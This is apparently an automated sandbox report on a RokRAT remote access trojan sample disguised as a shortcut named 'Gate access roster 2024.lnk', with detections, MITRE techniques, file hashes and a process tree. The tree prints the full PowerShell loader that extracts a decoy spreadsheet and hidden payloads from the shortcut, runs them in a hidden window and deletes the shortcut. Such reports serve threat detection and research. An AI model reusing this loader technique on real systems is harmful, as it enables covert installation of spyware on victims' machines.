rokrat | c25e5e87d1e665197209e7aaec64e484ce30e2dabcc9e457c5593ac6c7bb5686

Analysis

max time kernel
144s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/04/2024, 05:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Gate access roster 2024.lnk
Size

40.0MB
MD5

e4ddd5cc8b5f4d791f27d676d809f668
SHA1

506ffe6a5bb460ec943ee247c280de1dbe1775bf
SHA256

c25e5e87d1e665197209e7aaec64e484ce30e2dabcc9e457c5593ac6c7bb5686
SHA512

c59da52f56d84b1ef9d1d191978d3ba04267f4a661fd8f73f73e2c52cd70433f6b0f9ea977ad879dc4e44930789dce5765865e0b9d2a922888fc4b7c7222db9a
SSDEEP

24576:/gRXTTYdy830QmOpIDjW7sFAcXMh5X2wV:/gj4CDa7n2wV

Score

10^/10

rokrat rat

Malware Config

Signatures

Detect Rokrat payload 2 IoCs

resource	yara_rule
behavioral2/memory/5104-146-0x0000000032AD0000-0x0000000032BB3000-memory.dmp	family_rokrat
behavioral2/memory/5104-148-0x0000000032AD0000-0x0000000032BB3000-memory.dmp	family_rokrat

Rokrat
Rokrat is a remote access trojan written in c++.
rat rokrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
33	5104	powershell.exe
55	5104	powershell.exe
58	5104	powershell.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	cmd.exe

Deletes itself 1 IoCs

pid	Process
2988	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\14541.dat	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
368	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2988	powershell.exe
2988	powershell.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe
5104	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	5104	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
368	EXCEL.EXE
368	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1916 wrote to memory of 1852	1916	cmd.exe	86
PID 1916 wrote to memory of 1852	1916	cmd.exe	86
PID 1916 wrote to memory of 1852	1916	cmd.exe	86
PID 1852 wrote to memory of 5096	1852	cmd.exe	88
PID 1852 wrote to memory of 5096	1852	cmd.exe	88
PID 1852 wrote to memory of 5096	1852	cmd.exe	88
PID 1852 wrote to memory of 2988	1852	cmd.exe	90
PID 1852 wrote to memory of 2988	1852	cmd.exe	90
PID 1852 wrote to memory of 2988	1852	cmd.exe	90
PID 2988 wrote to memory of 368	2988	powershell.exe	92
PID 2988 wrote to memory of 368	2988	powershell.exe	92
PID 2988 wrote to memory of 368	2988	powershell.exe	92
PID 2988 wrote to memory of 3300	2988	powershell.exe	94
PID 2988 wrote to memory of 3300	2988	powershell.exe	94
PID 2988 wrote to memory of 3300	2988	powershell.exe	94
PID 3300 wrote to memory of 5104	3300	cmd.exe	95
PID 3300 wrote to memory of 5104	3300	cmd.exe	95
PID 3300 wrote to memory of 5104	3300	cmd.exe	95
PID 5104 wrote to memory of 856	5104	powershell.exe	105
PID 5104 wrote to memory of 856	5104	powershell.exe	105
PID 5104 wrote to memory of 856	5104	powershell.exe	105
PID 856 wrote to memory of 1136	856	csc.exe	106
PID 856 wrote to memory of 1136	856	csc.exe	106
PID 856 wrote to memory of 1136	856	csc.exe	106
PID 5104 wrote to memory of 4984	5104	powershell.exe	107
PID 5104 wrote to memory of 4984	5104	powershell.exe	107
PID 5104 wrote to memory of 4984	5104	powershell.exe	107
PID 4984 wrote to memory of 3644	4984	csc.exe	108
PID 4984 wrote to memory of 3644	4984	csc.exe	108
PID 4984 wrote to memory of 3644	4984	csc.exe	108
PID 5104 wrote to memory of 2404	5104	powershell.exe	109
PID 5104 wrote to memory of 2404	5104	powershell.exe	109
PID 5104 wrote to memory of 2404	5104	powershell.exe	109
PID 2404 wrote to memory of 3096	2404	csc.exe	110
PID 2404 wrote to memory of 3096	2404	csc.exe	110
PID 2404 wrote to memory of 3096	2404	csc.exe	110
PID 5104 wrote to memory of 2880	5104	powershell.exe	111
PID 5104 wrote to memory of 2880	5104	powershell.exe	111
PID 5104 wrote to memory of 2880	5104	powershell.exe	111
PID 2880 wrote to memory of 528	2880	csc.exe	112
PID 2880 wrote to memory of 528	2880	csc.exe	112
PID 2880 wrote to memory of 528	2880	csc.exe	112

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Gate access roster 2024.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0280216D} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010A4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00002E32;$lnkFile.Read($pdfFile, 0, 0x00002E32); $pdfPath = $lnkPath.replace('.lnk','.xlsx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x00003ED6,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'viewer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000DD2D8,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:public+'\'+'search.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii; $lnkFile.Seek(0x000DD882,[System.IO.SeekOrigin]::Begin); $batByte = New-Object byte[] 0x00000139;$lnkFile.Read($batByte, 0, 0x00000139);$executePath = $env:public+'\'+'find.bat'; Write-Host $executePath; Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0280216D} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x000010A4, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00002E32;$lnkFile.Read($pdfFile, 0, 0x00002E32); $pdfPath = $lnkPath.replace('.lnk','.xlsx');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x00003ED6,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'viewer.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x000DD2D8,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005AA;$lnkFile.Read($stringByte, 0, 0x000005AA);$batStrPath = $env:public+'\'+'search.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii; $lnkFile.Seek(0x000DD882,[System.IO.SeekOrigin]::Begin); $batByte = New-Object byte[] 0x00000139;$lnkFile.Read($batByte, 0, 0x00000139);$executePath = $env:public+'\'+'find.bat'; Write-Host $executePath; Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"
    3⤵
    - Deletes itself
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Gate access roster 2024.xlsx"
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\find.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3300
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:public+'\'+'search.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"
        5⤵
        Blocklisted process makes network request
        Checks BIOS information in registry
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5104
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j42gkj5j\j42gkj5j.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:856
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F66.tmp" "c:\Users\Admin\AppData\Local\Temp\j42gkj5j\CSC934F49EE8D1A449A938D56F5E254696E.TMP"
        7⤵
        
        PID:1136
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tr0tjwpu\tr0tjwpu.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6012.tmp" "c:\Users\Admin\AppData\Local\Temp\tr0tjwpu\CSCF4BC01FDD9CB4CE3A2D410A33D7BF8E.TMP"
        7⤵
        
        PID:3644
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dblphnik\dblphnik.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES615A.tmp" "c:\Users\Admin\AppData\Local\Temp\dblphnik\CSCE739FBFF2864BD29F8A7D9C58D5BFED.TMP"
        7⤵
        
        PID:3096
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yawfahcy\yawfahcy.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2880
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61A8.tmp" "c:\Users\Admin\AppData\Local\Temp\yawfahcy\CSC47111AA63A1B48F392243EF0C1F9205.TMP"
        7⤵
        
        PID:528

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
0774a05ce5ee4c1af7097353c9296c62

SHA1
658ff96b111c21c39d7ad5f510fb72f9762114bb

SHA256
d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4

SHA512
104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
7d61a41722b5b142e6050fd6f9f006f7

SHA1
5f326939a503d59797c271e5172cb78e5f353636

SHA256
730498caf113b14e5e8ccd082d2d8d4fad85f74cb87daa1e63dbdf1ee9d14fbd

SHA512
3cd5ec34f27d7e8d42c67b40b9f8b6370a6c93566934cce16c8e5acbeac50842d8fb69817d6de501f5bc7eeb33110b4c7b46c637a0026badcad0ba884c21460c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gate access roster 2024.xlsx

Filesize
11KB

MD5
eb458bc6415bc39bf7c4b82ca70af6b0

SHA1
93af7b44999b343ae824d5d8841737b1f826457f

SHA256
dd3803ade05abe200bac8cb34247b4318b45fc8e731f4f1b4a2f26f613201d07

SHA512
dadc879e5b0c7a863702a3ecd53d70c855616699b60ba9a5d224934b8bccaab662f3ee7115a342a49a25557e4223a98c22aedca38ce526647221590e58c52ebd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5F66.tmp

Filesize
1KB

MD5
7f1578cc3f35024b1155bd5efee0c326

SHA1
897d4d236c9680016366da89a96ec360cb365eba

SHA256
f4a6f7932da624db8ee2daf704a52b054d421418aea765de80297b56de02229e

SHA512
da5069212250b34ef87b136bf6e85076ead4a8f7d9a3ceed875d333a1dc4fbc8dd3ae3b5bc34fd9d4fd85fced54f19f195b45ee9e1f60641d138cbca533f978c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6012.tmp

Filesize
1KB

MD5
46a798d437e23d114e9ba6c10c2a2101

SHA1
3ea7a079f4e6d9af59fe835c1b5e575a3a86ac6d

SHA256
28cb18b8377ab16f642c9f71e3a48ae27ab6c2288275aef46ad9beb1d94b4ca8

SHA512
9a9e4f8ff6338c0307a35c8e511b3069ce8177ff996bd1b771012ca9b850f7b11234310abcd394723b755fc89b8db9073514999e50e46fd79e9fcb7987145ccf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES615A.tmp

Filesize
1KB

MD5
8fa7a0c18b031e2a54bcd14ce13be649

SHA1
e13e53e7749c56eb1511bff6a3f34dffba962e0d

SHA256
9173606fa78cdec70b3974e7263c077f1fb62321ed79059b5984a39ed8273a53

SHA512
9353aa30a994036ab9ce5730f61eada7d2ac31ed8e3dac0870eefff3426bfb3f22d9afed0bf85465ed937e47985e73f11be641b5124bc650f634152f39eb9a2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES61A8.tmp

Filesize
1KB

MD5
8f60c19611dace8dea1f9809a2a48a3f

SHA1
cfd551ff7867eb9a39b138a5f6ad5a1860d2cc92

SHA256
18c0483b6707604a3a312eda01c3fea3339e04638e013b76b5acf63b616d1d13

SHA512
650c8fcbb12d4e4f7242a4ca662043e5230f62f167f3eb7dbe04a9be087efc71d3d7664276ae3d47f68d63082b5745ab48d2a36c2b8a4395e1f1f6236c3991f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wrfi1sp3.3dd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dblphnik\dblphnik.dll

Filesize
3KB

MD5
9ae71050cb9df38809d8b0df2a945dcf

SHA1
c0394419eda042e586685cf427478e3747514bab

SHA256
176e138159a5bc4c4dcee1d30d4d2376758da0da0b1e0351423c1309bca9d026

SHA512
d2622ab43252cd5d5fefb5f4f48b6f68b52927f81077190b84a889adae4af708574826174697e3730b88cee88d22d829a0608e95fee23af06c8f26fd301165b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\j42gkj5j\j42gkj5j.dll

Filesize
3KB

MD5
d1909c9c8911ddcfc5d21831b54ce534

SHA1
9386f2d4afac3304fc316d05835d91a3a873b77e

SHA256
9b5e49583a716c8ba08f36a54900592a4302eade64f486377516ed00a7d5ed3c

SHA512
45c1897905798fddd45eb84c50bd06109ae0cdb95b24e4832840dfd080bc09c37b4a91299715c01104110de742e58300586c6bb8fed51b3745b49aebc74f897c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tr0tjwpu\tr0tjwpu.dll

Filesize
3KB

MD5
4a8f0d02155532d0aa4cd75af0294fdb

SHA1
2c558be9212faa97114ab613e60b957b1cb91656

SHA256
92625dce66069c6fc06f562bba7a166ca9e925f427d521b1dc5f8b28accb65a3

SHA512
af753b630f02796247b5d285e3e84fe0596b568a0e00e4ab9aa742d6d7f2c5bc2fc27efd4fc75356b3fa8457d189646758eb7a1737e9fffcf915ab2e6602f2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\yawfahcy\yawfahcy.dll

Filesize
3KB

MD5
be9a5be554ee7350eb88057894ce18de

SHA1
51d9156ac5c4e3ea99309b252b5e4b5ad816fcff

SHA256
e3d4ecad403fd9634cd5335d914fc71c27bcebcfabfc2ac9bac4d094e4674d70

SHA512
ae1aedf44dd2ff4bae8f10428c12e9b5d61f08bf8b19901c2236807c392d480861110e01380896356ffa377f7cfdc17058b0511d664dd8595bdb2c528e70e2fb

Download Submit
C:\Users\Public\find.bat

Filesize
315B

MD5
35441efd293d9c9fb4788a3f0b4f2e6b

SHA1
eb02c53e6f42219096e7ea5d274c08548255b289

SHA256
f1811cac3da8f47266efba84d96127bbd19b265e8d477ff1d245281042790e89

SHA512
d539a96c474b1a6fb0a731bfd858333bde17161c943736015cb4c7094fc3fedb4f314f0eadd7be169488119a58392a53f52a65bf910bb37791444c08cbcc6a03

Download Submit
C:\Users\Public\search.dat

Filesize
1KB

MD5
68386fa9933b2dc5711dffcee0748115

SHA1
12e52c446b17a83cbd38d2a382c996410ddf4abf

SHA256
3dd8da415dcbe9376b54cf04b36159a240afca9082a73397f4bd809fb6281760

SHA512
ea95c8bf213cf111e0dc0a3bd897af0d6b35f04e6b6e242ee54ea3f2a2e5c504c178717ad80aac7d9c1246e9070b27b683c68f21aa9160c0319b7967b718ec78

Download Submit
C:\Users\Public\viewer.dat

Filesize
869KB

MD5
bd07b927bb765ccfc94fadbc912b0226

SHA1
ce52d2b59d00ad32696ac091f05846bdab692c4a

SHA256
2ae727feffb939434fd9c3804517d868fbe42a8e2d66fd0eef9fa14f3e9c7a27

SHA512
3b82448ced5916a18990060db352a9174a9e09c81f863f80c4d993b0500681c8de14c325ff321be465849227a36245a7e8777bc55b75de5bd6372dcfef33632b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dblphnik\CSCE739FBFF2864BD29F8A7D9C58D5BFED.TMP

Filesize
652B

MD5
9f56ed28980e466ed80ad1098786c593

SHA1
345a189b33217d3d331c7d4f33a147024b13d50d

SHA256
8f8ef4415e8b98f7c49a2516f9eb9662f5870a950d8c2c6862cc188059a5189d

SHA512
bde61581432f5d83bb4996b083a2a22818a17959871ef70b97e875893cd525cf47364027326c31e4870d790a09acd9f5498191c2e1e662b4ac3417c41fa7b994

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dblphnik\dblphnik.0.cs

Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dblphnik\dblphnik.cmdline

Filesize
369B

MD5
60dc136355483eacccc65c82668e406c

SHA1
f6c8e18e8ecc05c6eb50bcd392f81b58cca918ee

SHA256
ee2f47165ecca81122ddf3ed4085d295f2afa5d31473f7edf76f8c112cc67975

SHA512
fec9b0be838c9853235da844c24eb408613ef329581e20d9e3d4e084f798014e8507652e8e7eaf66683488f93efb90efb2273e1ce063002d8fb513005f577c3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j42gkj5j\CSC934F49EE8D1A449A938D56F5E254696E.TMP

Filesize
652B

MD5
bce8cf3e08baaa333980680befeefd43

SHA1
896c134bfe73221592b6184e18cdc11eb2cb695c

SHA256
c6d1c09a76505e52e4ecb7a55cae029e5162e10799daa7fb0d0acd3c591f91ca

SHA512
836c84518c9b58a99aa2c24214e3fc633ce14732c212680c4fc87efe7d0342538364c8e6eab8bd5ce9d6d23d56fe0fbcb5050d0b36eb47d6fd4be0b045c979b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j42gkj5j\j42gkj5j.0.cs

Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j42gkj5j\j42gkj5j.cmdline

Filesize
369B

MD5
ae0fa0c4a859dd50c1544ab507b373f2

SHA1
4f7d93af3a9069d28284a27a1a1dcfd1c9855807

SHA256
8f7bef70ad82233f8c02e5e0fa19004d553355894fef58102260b75c9c64f1f1

SHA512
03caad279b771b012c236b5e8863fff25c7522d0fd2c46477f19f22db759f47de8ad7231fdf94e43fdf5e36ae78f02017afff051b9064b8e5969316dc2c96907

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr0tjwpu\CSCF4BC01FDD9CB4CE3A2D410A33D7BF8E.TMP

Filesize
652B

MD5
2b8a9f5e7769e16a83c39983139b2c96

SHA1
48000591e9aa335dd33d60a11fa0a9517fbc5b4a

SHA256
ee1240053ff8519fce8bcebd81bd3f6c77c670862ba7fe8746c910778f791526

SHA512
28e7dcaf754ea401fa132c690974c5874aa72fdfae16b12117666c02c4f94a361982b7b394a229bb3d08c605c314422b7c21b381e604acc761464a1a42ea2217

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr0tjwpu\tr0tjwpu.0.cs

Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tr0tjwpu\tr0tjwpu.cmdline

Filesize
369B

MD5
7f60141afbf7418f5406c01bc120f5f7

SHA1
c88024555eb93b5b2124f46cbb9a9607693ea6f4

SHA256
42d7661590b9f2f685fff802feb8932c57b70688ce019552643a4f13915291ff

SHA512
eae4fd282d7890fdb96df69623c04c0e103d96694950a1b1e2274a7331f72f621fcec427c7d735742302fcb0ff328bd2f7a9e74499dee7cdc25dec57cca51d87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yawfahcy\CSC47111AA63A1B48F392243EF0C1F9205.TMP

Filesize
652B

MD5
a73de6a1ac8fde6c90f8deb32112026c

SHA1
82995feb28f947ef8d8b8271c0c8b8961f6893af

SHA256
d654b3d4a9838917aaefa905af4d2e40bfdc1a80773e88a00c8d4b91b57673ca

SHA512
c5dd54a8deca2d3f127b9dd70190e86d953fd99611d8a320ddd9f0c0ac0e646d1c9c8b607d49dc9f5b9d4ef7c8218e673cd11904ea95b6d282f5a9c8f4344b0c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yawfahcy\yawfahcy.0.cs

Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yawfahcy\yawfahcy.cmdline

Filesize
369B

MD5
d3632d33a8af4089eca7ce39ab63e7bd

SHA1
4f7427a2ec236b4958d00318cf0cf8cbb888629b

SHA256
e9cf6dec846f778d0790a28d272d669ec3488da9bd49e807ec88b682b70a16ee

SHA512
95a916cab585bbe95675aa507cdfc7252a94f760dce705302b26e2bf66b83ac177bc93f9e828cadc843822ad10df20e641d15791cf24112957ba2e12cef3f1e5

Download Submit
memory/368-29-0x00007FFC0A7B0000-0x00007FFC0A7C0000-memory.dmp

Filesize
64KB

Download
memory/368-39-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
2.0MB

Download
memory/368-41-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
2.0MB

Download
memory/368-42-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
2.0MB

Download
memory/368-44-0x00007FFC08040000-0x00007FFC08050000-memory.dmp

Filesize
64KB

Download
memory/368-45-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
2.0MB

Download
memory/368-43-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
2.0MB

Download
memory/368-46-0x00007FFC4A730000-0x00007FFC4A925000-memory.dmp

Filesize
